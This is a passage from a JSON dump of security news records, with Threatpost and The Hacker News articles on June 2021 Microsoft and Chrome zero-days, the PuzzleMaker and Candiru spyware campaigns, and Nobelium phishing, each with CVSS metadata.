reported that six of the bugs are currently under active attack, while three are publicly known at the time of release.\n\nThe number might seem light \u2013 it represents six fewer patches than Microsoft [released in May](<https://threatpost.com/wormable-windows-bug-dos-rce/166057/>) \u2013 but the number of critical vulnerabilities ticked up to five month-over-month.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThose actively exploited vulnerabilities can enable an attacker to hijack a system. They have no workarounds, so some security experts are recommending that they be patched as the highest priority.\n\nThe six CVEs under active attack in the wild include four elevation of privilege vulnerabilities, one information disclosure vulnerability and one remote code execution (RCE) vulnerability.\n\n## Critical Bugs of Note\n\n[CVE-2021-31985](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31985>) is a critical RCE vulnerability in Microsoft\u2019s Defender antimalware software that should grab attention. A similar, critical bug in Defender was [patched in January](<https://threatpost.com/critical-microsoft-defender-bug-exploited/162992/>). The most serious of the year\u2019s first Patch Tuesday, that earlier Defender bug was an RCE vulnerability that came under active exploit.\n\nAnother critical flaw is [CVE-2021-31963](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31963>), a Microsoft SharePoint Server RCE vulnerability. Jay Goodman, director of product marketing at Automox, said in a [blog post](<https://blog.automox.com/automox-experts-weigh-in-june-patch-tuesday-2021>) that an attacker exploiting this vulnerability \u201ccould take control of a system where they would be free to install programs, view or change data, or create new accounts on the target system with full user rights.\u201d \nWhile Microsoft reports that this vulnerability is less likely to be exploited,Goodman suggested that organizations don\u2019t let it slide: \u201cPatching critical vulnerabilities in the 72-hour window before attackers can weaponize is an important first step to maintaining a safe and secure infrastructure,\u201d he observed.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/06/08141612/Sophos-impact-chart-June-21-patch-Tuesday-e1623176186946.png>)\n\nA year-to-date summary of 2021 Microsoft vulnerability releases as of June. Source: Sophos\n\n## Bugs Exploited in the Wild\n\nMicrosoft fixed a total of seven zero-day vulnerabilities. One was [CVE-2021-31968](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31968>), Windows Remote Desktop Services Denial of Service Vulnerability that was publicly disclosed but hasn\u2019t been seen in attacks. It was issued a CVSS score of 7.5.\n\nThese are the six flaws that MIcrosoft said are under active attack, all of them also zero days.\n\n * [CVE-2021-31955](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31955>) \u2013 Windows Kernel Information Disclosure Vulnerability. Rating: Important. CVSS 5.5\n * [CVE-2021-31956](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31956>) \u2013 Windows NTFS Elevation of Privilege Vulnerability. Rating: Important. CVSS 7.8\n * [CVE-2021-33739](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33739>) \u2013 Microsoft DWM Core Library Elevation of Privilege Vulnerability. Rating: Important. CVSS 8.4\n * [CVE-2021-33742](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33742>) \u2013 Windows MSHTML Platform Remote Code Execution Vulnerability. Rating: **Critical**. CVSS 7.5\n * [CVE-2021-31199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31199>) \u2013 Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability. Rating: Important. CVSS 5.2\n * [CVE-2021-31201](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31201>) \u2013 Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability. Rating: Important. CVSS 5.2\n\n## CVE-2021-33742\n\nThis RCE vulnerability exploits MSHTML, a component used by the Internet Explorer engine to read and display content from websites.The bug could allow an attacker to execute code on a target system if a user views specially crafted web content. The [Zero Day Initiative](<https://www.zerodayinitiative.com/blog/2021/6/8/the-june-2021-security-update-review>)\u2018s (ZDI\u2019s) Dustin Childs noted in his Patch Tuesday analysis that since the vulnerability is in the Trident (MSHTML) engine itself, many different applications are affected, not just Internet Explorer. \u201cIt\u2019s not clear how widespread the active attacks are, but considering the vulnerability impacts all supported Windows versions, this should be at the top of your test and deploy list,\u201d he recommended.\n\nThe vulnerability doesn\u2019t require special privilege to exploit, though the attack complexity is high, if that\u2019s any consolation. An attacker would need to do some extra legwork to pull it off, noted Satnam Narang, staff research engineer at Tenable, in an email to Threatpost on Tuesday.\n\nImmersive Labs\u2019 Kevin Breen, director of cyber threat research, noted that visiting a website in a vulnerable browser is \u201ca simple way for attackers to deliver this exploit.\u201d He told Threatpost via email on Tuesday that since the library is used by other services and applications, \u201cemailing HTML files as part of a phishing campaign is also a viable method of delivery.\u201d\n\n[Sophos decreed](<https://news.sophos.com/en-us/2021/06/08/six-in-the-wild-exploits-patched-in-microsofts-june-security-fix-release/>) this one to be the top concern of this month\u2019s crop, given that it\u2019s already being actively exploited by malicious actors.\n\n## CVE-2021-31955, CVE-2021-31956: Used in PuzzleMaker Targeted Malware\n\nCVE-2021-31955 is an information disclosure vulnerability in the Windows Kernel, while CVE-2021-31956 is an elevation of privilege vulnerability in Windows NTFS. The ZDI\u2019s Childs noted that CVE-2021-31956 was reported by the same researcher who found CVE-2021-31955, an information disclosure bug also listed as under active attack. They could be linked, he suggested: \u201cIt\u2019s possible these bugs were used in conjunction, as that is a common technique \u2013 use a memory leak to get the address needed to escalate privileges. These bugs are important on their own and could be even worse when combined. Definitely prioritize the testing and deployment of these patches.\u201d\n\nHe was spot-on. On Tuesday, Kaspersky announced that its researchers had discovered a highly targeted malware campaign launched in April against multiple companies, in which a previously unknown threat actor used a chain of Chrome and Windows zero-day exploits: Namely, these two.\n\nIn a press release, Kaspersky said that one of the exploits was used for RCE in the Google Chrome web browser, while the other was an elevation of privilege exploit fine-tuned to target \u201cthe latest and most prominent builds\u201d of Windows 10.\n\n\u201cRecent months have seen a wave of advanced threat activity exploiting zero-days in the wild,\u201d according to the release. \u201cIn mid-April, Kaspersky experts discovered yet a new series of highly targeted exploit attacks against multiple companies that allowed the attackers to stealthily compromise the targeted networks.\u201d\n\nKaspersky hasn\u2019t yet found a connection between these attacks and any known threat actors, so it\u2019s gone ahead and dubbed the actor PuzzleMaker. It said that all the attacks were conducted through Chrome and used an exploit that allowed for RCE. Kaspersky researchers weren\u2019t able to retrieve the code for the exploit, but the timeline and availability suggests the attackers were using the now-patched [CVE-2021-21224](<https://www.cvedetails.com/cve/CVE-2021-21224>) vulnerability in Chrome and Chromium browsers that allows attackers to exploit the Chrome renderer process (the processes that are responsible for what happens inside users\u2019 tabs).\n\nKaspersky experts did find and analyze the second exploit, however: An elevation of privilege exploit that exploits two distinct vulnerabilities in the Microsoft Windows OS kernel: CVE-2021-31955 and CVE-2021-31956. The CVE-2021-31955 bug \u201cis affiliated with SuperFetch, a feature first introduced in Windows Vista that aims to reduce software loading times by pre-loading commonly used applications into memory,\u201d they explained.\n\nThe second flaw, CVE-2021-31956, is an Elevation of Privilege vulnerability and heap-based buffer overflow. Kaspersky said that attackers used this vulnerability alongside Windows Notification Facility (WNF) \u201cto create arbitrary memory read/write primitives and execute malware modules with system privileges.\u201d\n\n\u201cOnce the attackers have used both the Chrome and Windows exploits to gain a foothold in the targeted system, the stager module downloads and executes a more complex malware dropper from a remote server,\u201d they continued. \u201cThis dropper then installs two executables, which pretend to be legitimate files belonging to Microsoft Windows OS. The second of these two executables is a remote shell module, which is able to download and upload files, create processes, sleep for certain periods of time, and delete itself from the infected system.\u201d\n\nBoris Larin, senior security researcher with Kaspersky\u2019s Global Research and Analysis Team (GReAT), said that the team hasn\u2019t been able to link these highly targeted attacks to any known threat actor: Hence the name PuzzleMaker and the determination to closely monitor the security landscape \u201cfor future activity or new insights about this group,\u201d he was quoted as saying in the press release.\n\nIf the current trend is any indication, expect to see more of the same, Larin said. \u201cOverall, of late, we\u2019ve been seeing several waves of high-profile threat activity being driven by zero-day exploits,\u201d he said. \u201cIt\u2019s a reminder that zero days continue to be the most effective method for infecting targets. Now that these vulnerabilities have been made publicly known, it\u2019s possible that we\u2019ll see an increase of their usage in attacks by this and other threat actors. That means it\u2019s very important for users to download the latest patch from Microsoft as soon as possible.\u201d\n\n## CVE-2021-31199/CVE-2021-31201\n\nThe two Enhanced Cryptographic Provider Elevation of Privilege vulnerabilities are linked to the Adobe Reader bug that [came under active attack](<https://threatpost.com/adobe-zero-day-bug-acrobat-reader/166044/>) last month (CVE-2021-28550), ZDI explained. \u201cIt\u2019s common to see privilege escalation paired with code execution bugs, and it seems these two vulnerabilities were the privilege escalation part of those exploits,\u201d he explained. \u201cIt is a bit unusual to see a delay between patch availability between the different parts of an active attack, but good to see these holes now getting closed.\u201d\n\n## CVE-2021-33739\n\nBreen noted that privilege escalation vulnerabilities such as this one in the Microsoft DWM Core Library are just as valuable to attackers as RCEs. \u201cOnce they have gained an initial foothold, they can move laterally across the network and uncover further ways to escalate to system or domain-level access,\u201d he said. \u201cThis can be hugely damaging in the event of ransomware attacks, where high privileges can enable the attackers to stop or destroy backups and other security tools.\u201d\n\n**Download our exclusive FREE Threatpost Insider eBook, ****_\u201c_**[**_2021: The Evolution of Ransomware_**](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)**_,\u201d_**** to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. Get the whole story and **[**DOWNLOAD**](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)** the eBook now \u2013 on us!**\n", "cvss3": {}, "published": "2021-06-08T21:45:12", "type": "threatpost", "title": "Microsoft Patch Tuesday Fixes 6 In-The-Wild Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21224", "CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31963", "CVE-2021-31968", "CVE-2021-31985", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-06-08T21:45:12", "id": "THREATPOST:61CC1EAC83030C2B053946454FE77AC3", "href": "https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:39:20", "description": "[](<https://thehackernews.com/images/-lnmWNBrSE9k/YPWhrFsftuI/AAAAAAAA4Tc/mV6atejnTU8JKQ98Latgx1poZRDDLxvXgCLcBGAsYHQ/s0/cyber.jpg>)\n\nTwo of the zero-day Windows flaws rectified by Microsoft as part of its Patch Tuesday update earlier this week were weaponized by an Israel-based company called Candiru in a series of \"precision attacks\" to hack more than 100 journalists, academics, activists, and political dissidents globally.\n\nThe spyware vendor was also formally identified as the commercial surveillance company that Google's Threat Analysis Group (TAG) revealed as exploiting multiple zero-day vulnerabilities in Chrome browser to target victims located in Armenia, according to a report published by the University of Toronto's Citizen Lab.\n\n\"[Candiru](<https://www.forbes.com/sites/thomasbrewster/2019/10/03/meet-candiru-the-super-stealth-cyber-mercenaries-hacking-apple-and-microsoft-pcs-for-profit/>)'s apparent widespread presence, and the use of its surveillance technology against global civil society, is a potent reminder that the mercenary spyware industry contains many players and is prone to widespread abuse,\" Citizen Lab researchers [said](<https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/>). \"This case demonstrates, yet again, that in the absence of any international safeguards or strong government export controls, spyware vendors will sell to government clients who will routinely abuse their services.\"\n\nFounded in 2014, the private-sector offensive actor (PSOA) \u2014 codenamed \"Sourgum\" by Microsoft \u2014 is said to be the developer of an espionage toolkit dubbed DevilsTongue that's exclusively sold to governments and is capable of infecting and monitoring a broad range of devices across different platforms, including iPhones, Androids, Macs, PCs, and cloud accounts.\n\nCitizen Lab said it was able to recover a copy of Candiru's Windows spyware after obtaining a hard drive from \"a politically active victim in Western Europe,\" which was then reverse engineered to identify two never-before-seen Windows zero-day exploits for vulnerabilities tracked as [CVE-2021-31979 and CVE-2021-33771](<https://thehackernews.com/2021/07/update-your-windows-pcs-to-patch-117.html>) that were leveraged to install malware on victim boxes.\n\nThe infection chain relied on a mix of browser and Windows exploits, with the former served via single-use URLs sent to targets on messaging applications such as WhatsApp. Microsoft addressed both the privilege escalation flaws, which enable an adversary to escape browser sandboxes and gain kernel code execution, on July 13.\n\nThe intrusions culminated in the deployment of DevilsTongue, a modular C/C++-based backdoor equipped with a number of capabilities, including exfiltrating files, exporting messages saved in the encrypted messaging app Signal, and stealing cookies and passwords from Chrome, Internet Explorer, Firefox, Safari, and Opera browsers.\n\nMicrosoft's analysis of the digital weapon also found that it could abuse the stolen cookies from logged-in email and social media accounts like Facebook, Twitter, Gmail, Yahoo, Mail.ru, Odnoklassniki, and Vkontakte to collect information, read the victim's messages, retrieve photos, and even send messages on their behalf, thus allowing the threat actor to send malicious links directly from a compromised user's computer.\n\nSeparately, the Citizen Lab report also tied the two Google Chrome vulnerabilities disclosed by the search giant on Wednesday \u2014 [CVE-2021-21166 and CVE-2021-30551](<https://thehackernews.com/2021/07/google-details-ios-chrome-ie-zero-day.html>) \u2014 to the Tel Aviv company, noting overlaps in the websites that were used to distribute the exploits.\n\nFurthermore, 764 domains linked to Candiru's spyware infrastructure were uncovered, with many of the domains masquerading as advocacy organizations such as Amnesty International, the Black Lives Matter movement, as well as media companies, and other civil-society themed entities. Some of the systems under their control were operated from Saudi Arabia, Israel, U.A.E., Hungary, and Indonesia.\n\nOver 100 victims of SOURGUM's malware have been identified to date, with targets located in Palestine, Israel, Iran, Lebanon, Yemen, Spain (Catalonia), United Kingdom, Turkey, Armenia, and Singapore. \"These attacks have largely targeted consumer accounts, indicating Sourgum's customers were pursuing particular individuals,\" Microsoft's General Manager of Digital Security Unit, Cristin Goodwin, [said](<https://blogs.microsoft.com/on-the-issues/2021/07/15/cyberweapons-cybersecurity-sourgum-malware/>).\n\nThe latest report arrives as TAG researchers Maddie Stone and Clement Lecigne noted a surge in attackers using more zero-day exploits in their cyber offensives, in part fueled by more commercial vendors selling access to zero-days than in the early 2010s.\n\n\"Private-sector offensive actors are private companies that manufacture and sell cyberweapons in hacking-as-a-service packages, often to government agencies around the world, to hack into their targets' computers, phones, network infrastructure, and other devices,\" Microsoft Threat Intelligence Center (MSTIC) [said](<https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/>) in a technical rundown.\n\n\"With these hacking packages, usually the government agencies choose the targets and run the actual operations themselves. The tools, tactics, and procedures used by these companies only adds to the complexity, scale, and sophistication of attacks,\" MSTIC added.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-16T11:13:00", "type": "thn", "title": "Israeli Firm Helped Governments Target Journalists, Activists with 0-Days and Spyware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21166", "CVE-2021-30551", "CVE-2021-31979", "CVE-2021-33771"], "modified": "2021-07-19T16:01:00", "id": "THN:CDCF433A7837180E1F294791C672C5BB", "href": "https://thehackernews.com/2021/07/israeli-firm-helped-governments-target.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:58", "description": "[](<https://thehackernews.com/images/--v2cn8JGV00/YMGRd9cFvrI/AAAAAAAACz4/i5Stk6m4GEgwbul82T6lZeEbdMMNfofJQCLcBGAsYHQ/s0/chrome-zero-day-vulnerability.jpg>)\n\nAttention readers, if you are using Google Chrome browser on your Windows, Mac, or Linux computers, you need to update it immediately to the latest version Google released earlier today.\n\nThe internet services company has rolled out an urgent update to the browser to address 14 newly discovered security issues, including a zero-day flaw that it says is being actively exploited in the wild.\n\nTracked as [CVE-2021-30551](<https://chromereleases.googleblog.com/2021/06/stable-channel-update-for-desktop.html>), the vulnerability stems from a type confusion issue in its V8 open-source and JavaScript engine. Sergei Glazunov of Google Project Zero has been credited with discovering and reporting the flaw.\n\nAlthough the search giant's Chrome team issued a terse statement acknowledging \"an exploit for CVE-2021-30551 exists in the wild,\" Shane Huntley, Director of Google's Threat Analysis Group, [hinted](<https://twitter.com/ShaneHuntley/status/1402712986289016835>) that the vulnerability was leveraged by the same actor that abused [CVE-2021-33742](<https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html>), an actively exploited remote code execution flaw in Windows MSHTML platform that was addressed by Microsoft as part of its Patch Tuesday update on June 8.\n\n[](<https://thehackernews.com/images/-XI4fkisfDp0/YMGPq0RtpKI/AAAAAAAACzw/d0mpshr20nw2j--sOXxBrrTJIj2IP95ewCLcBGAsYHQ/s0/chrome-zero-day.jpg>)\n\nThe two zero-days are said to have been provided by a commercial exploit broker to a nation-state actor, which used them in limited attacks against targets in Eastern Europe and the Middle East, Huntley said.\n\nMore technical details about the nature of the attacks are to be released in the coming weeks so as to allow a majority of the users to install the update and prevent other threat actors from creating exploits targeting the flaw.\n\nWith the latest fix, Google has addressed a total of seven zero-days in Chrome since the start of the year \u2014\n\n * [**CVE-2021-21148**](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) \\- Heap buffer overflow in V8\n * [**CVE-2021-21166**](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>) \\- Object recycle issue in audio\n * [**CVE-2021-21193**](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21206**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21220**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Insufficient validation of untrusted input in V8 for x86_64\n * [**CVE-2021-21224**](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>) \\- Type confusion in V8\n\nChrome users can update to the latest version (91.0.4472.101) by heading to Settings &gt; Help &gt; About Google Chrome to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-10T04:14:00", "type": "thn", "title": "New Chrome 0-Day Bug Under Active Attacks \u2013 Update Your Browser ASAP!", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-33742"], "modified": "2021-06-10T10:25:50", "id": "THN:7D7C05739ECD847B8CDEEAF930C51BF8", "href": "https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:01", "description": "[](<https://thehackernews.com/images/-fNVyfZ9xLu4/YLDS4IiFgCI/AAAAAAAACq0/ysLAa9WYkXYAknx7W8VKLTshqroWpDJFgCLcBGAsYHQ/s0/russian-hackers.jpg>)\n\nMicrosoft on Thursday disclosed that the threat actor behind the [SolarWinds supply chain hack](<https://thehackernews.com/2021/03/researchers-find-3-new-malware-strains.html>) returned to the threat landscape to target government agencies, think tanks, consultants, and non-governmental organizations located across 24 countries, including the U.S.\n\nSome of the entities that were singled out include the U.S. Atlantic Council, the Organization for Security and Co-operation in Europe (OSCE), the Ukrainian Anti-Corruption Action Center (ANTAC), the EU DisinfoLab, and the Government of Ireland's Department of Foreign Affairs.\n\n\"This wave of attacks targeted approximately 3,000 email accounts at more than 150 different organizations,\" Tom Burt, Microsoft's Corporate Vice President for Customer Security and Trust, [said](<https://blogs.microsoft.com/on-the-issues/2021/05/27/nobelium-cyberattack-nativezone-solarwinds/>). \"At least a quarter of the targeted organizations were involved in international development, humanitarian, and human rights work.\"\n\nMicrosoft attributed the ongoing intrusions to the Russian threat actor it tracks as Nobelium, and by the wider cybersecurity community under the monikers APT29, UNC2452 (FireEye), SolarStorm (Unit 42), StellarParticle (Crowdstrike), Dark Halo (Volexity), and Iron Ritual (Secureworks).\n\nThe latest [wave](<https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/>) in a series of intrusions is said to have begun on Jan. 28, 2021, before reaching a new level of escalation on May 25. The attacks leveraged a legitimate mass-mailing service called Constant Contact to conceal its malicious activity and masquerade as USAID, a U.S.-based development organization, for a wide-scale phishing campaign that distributed phishing emails to a variety of organizations and industry verticals.\n\n\"Nobelium launched this week's attacks by gaining access to the Constant Contact account of USAID,\" Burt said.\n\nThese seemingly authentic emails included a link that, when clicked, delivered a malicious optical disc image file (\"ICA-declass.iso\") to inject a custom Cobalt Strike Beacon implant dubbed NativeZone (\"Documents.dll\"). The backdoor, similar to previous custom malware like [Raindrop](<https://thehackernews.com/2021/01/researchers-discover-raindrop-4th.html>) and [Teardrop](<https://thehackernews.com/2020/12/a-second-hacker-group-may-have-also.html>), comes equipped with capabilities to maintain persistent access, conduct lateral movement, exfiltrate data, and install additional malware.\n\n[](<https://thehackernews.com/images/-Kqca89OnZHA/YLDPv9iZshI/AAAAAAAACqk/k4ouHzcz69c07swH-6a9KPn5MiMEqeytgCLcBGAsYHQ/s0/hackers.jpg>)\n\nIn another variation of the targeted attacks detected before April, Nobelium experimented with profiling the target machine after the email recipient clicked the link. In the event the underlying operating system turned out to be iOS, the victim was redirected to a second remote server to dispatch an exploit for the then zero-day [CVE-2021-1879](<https://thehackernews.com/2021/03/apple-issues-urgent-patch-update-for.html>). Apple addressed the flaw on March 26, acknowledging that \"this issue may have been actively exploited.\"\n\n[](<https://thehackernews.com/images/-VCSkL1uJd1E/YLDQPDIOPaI/AAAAAAAACqs/_v2-iFt6JOc5GNscw2QmgJTekQnK5Kr-gCLcBGAsYHQ/s0/ms-windows.jpg>)\n\nCybersecurity firms [Secureworks](<https://www.secureworks.com/blog/usaid-themed-phishing-campaign-leverages-us-elections-lure>) and [Volexity](<https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/>), which corroborated the findings, said the campaign singled out non-governmental organizations, research institutions, government entities, and international agencies situated in the U.S., Ukraine, and the European Union.\n\n\"The very narrow and specific set of email identifiers and organizations observed by CTU researchers strongly indicate that the campaign is focused on U.S. and European diplomatic and policy missions that would be of interest to foreign intelligence services,\" researchers from Secureworks Counter Threat Unit noted.\n\nThe latest attacks add to evidence of the threat actor's recurring pattern of using [unique infrastructure](<https://thehackernews.com/2021/04/researchers-find-additional.html>) and tooling for each target, thereby giving the attackers a high level of stealth and enabling them to remain undetected for extended periods of time.\n\nThe ever-evolving nature of Nobelium's tradecraft is also likely to be a direct response to the highly publicized SolarWinds incident, suggesting the attackers could further continue to experiment with their methods to meet their objectives.\n\n\"When coupled with the attack on SolarWinds, it's clear that part of Nobelium's playbook is to gain access to trusted technology providers and infect their customers,\" Burt said. \"By piggybacking on software updates and now mass email providers, Nobelium increases the chances of collateral damage in espionage operations and undermines trust in the technology ecosystem.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-05-28T11:24:00", "type": "thn", "title": "SolarWinds Hackers Target Think Tanks With New 'NativeZone' Backdoor", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1879"], "modified": "2021-06-02T04:59:08", "id": "THN:D28CBE91134FEFC2BFDB69F581D44799", "href": "https://thehackernews.com/2021/05/solarwinds-hackers-target-think-tanks.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-05-09T12:37:56", "description": "[](<https://thehackernews.com/images/-F1yuaWSy7gY/YMwPdaXQ2DI/AAAAAAAAC6A/mimpmywKfJIUJoPg7HuGaeY4E1nZogbKQCLcBGAsYHQ/s0/chrome-update.jpg>)\n\nGoogle has rolled out yet another update to Chrome browser for Windows, Mac, and Linux to fix four security vulnerabilities, including one zero-day flaw that's being exploited in the wild.\n\nTracked as **CVE-2021-30554**, the high severity flaw concerns a [use after free vulnerability](<https://cwe.mitre.org/data/definitions/416.html>) in WebGL (aka Web Graphics Library), a JavaScript API for rendering interactive 2D and 3D graphics within the browser.\n\nSuccessful exploitation of the flaw could mean corruption of valid data, leading to a crash, and even execution of unauthorized code or commands.\n\nThe issue was reported to Google anonymously on June 15, Chrome technical program manager Srinivas Sista [noted](<https://chromereleases.googleblog.com/2021/06/stable-channel-update-for-desktop_17.html>), adding the company is \"aware that an exploit for CVE-2021-30554 exists in the wild.\"\n\n[](<https://thehackernews.com/images/-ZBYemfi9DNk/YMwOkeK_woI/AAAAAAAAC54/vEnl5bwj7bEa33jqkIiw-8fKTpRk0l-FQCLcBGAsYHQ/s0/hacker.jpg>)\n\nWhile it's usually the norm to limit details of the vulnerability until a majority of users are updated with the fix, the development comes less than 10 days after Google addressed another zero-day vulnerability exploited in active attacks ([CVE-2021-30551](<https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html>)).\n\nCVE-2021-30554 is also the eighth zero-day flaw patched by Google since the start of the year.\n\n\"I'm happy we are getting better at detecting these exploits and the great partnerships we have to get the vulnerabilities patched, but I remain concerned about how many are being discovered on an ongoing basis and the role of commercial providers,\" [tweeted](<https://twitter.com/ShaneHuntley/status/1402320073818132483>) Shane Huntley, Director of Google's Threat Analysis Group, on June 8.\n\nChrome users are recommended to update to the latest version (91.0.4472.114) by heading to Settings &gt; Help &gt; 'About Google Chrome' to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-18T03:16:00", "type": "thn", "title": "Update\u200c \u200cYour Chrome Browser to Patch Yet Another 0-Day Exploit\u200ced \u200cin\u200c-the\u200c-Wild", "bulletinFamily": "info", 